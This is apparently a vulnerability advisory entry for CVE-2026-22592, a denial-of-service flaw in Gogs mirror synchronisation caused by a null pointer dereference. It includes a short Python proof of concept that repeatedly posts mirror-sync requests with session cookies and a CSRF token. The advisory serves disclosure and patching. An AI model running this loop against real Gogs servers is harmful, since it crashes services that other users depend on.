CVE-2026-22592
MEDIUM6.5EPSS 0.02%Gogs has a Denial of Service issue
描述
### Summary An authenticated user can cause a DOS attack. If one of the repo files is deleted before synchronization, it will cause the application to crash. ### Details If GetMirrorByRepoID fails, the error log dereferencing null pointer. This happens if the repository no longer exits. https://github.com/gogs/gogs/blob/4cc83c498b6ae59356a04912d68a932165bad5e6/internal/database/mirror.go#L333-L337 if `err != nil` `m` is alwasa `nil` https://github.com/gogs/gogs/blob/4cc83c498b6ae59356a04912d68a932165bad5e6/internal/database/mirror.go#L269-L278 ### PoC Spam mirror-sync on repo and delete this repo code python spam mirror-sync ```py import requests url = "http://gogs.lan:3000/superuser/gobypass403/settings" headers = { "Cookie": "lang=en-US; i_like_gogs=fe32281ab84ae868; _csrf=UCw6xvqR-L7YLBMPjujwjywxy8s6MTc2NDc3NDQ2NDE1MzU5ODQ3Mg", } data = { "_csrf": "UCw6xvqR-L7YLBMPjujwjywxy8s6MTc2NDc3NDQ2NDE1MzU5ODQ3Mg", "action": "mirror-sync", } while True: print("syncing") response = requests.post(url, headers=headers, data=data) ``` ### Impact Denial of Service server crash.
受影響套件(2)
- Go/gogs.io/gogsfrom 0, < 0.13.4
- Go/gogs.io/gogsfrom 0
CVSS 分數
| 來源 | 版本 | 嚴重程度 | 向量 |
|---|---|---|---|
| osv | CVSS 3.1 | MEDIUM6.5 | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H |
參考連結(6)
- ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2026-22592
- PATCHhttps://github.com/gogs/gogs
- WEBhttps://github.com/gogs/gogs/blob/4cc83c498b6ae59356a04912d68a932165bad5e6/internal/database/mirror.go#L269-L278
- WEBhttps://github.com/gogs/gogs/blob/4cc83c498b6ae59356a04912d68a932165bad5e6/internal/database/mirror.go#L333-L337
- WEBhttps://github.com/gogs/gogs/commit/961a79e8f9f2b3190ea804bcf635e4b43b123272
- WEBhttps://github.com/gogs/gogs/security/advisories/GHSA-cr88-6mqm-4g57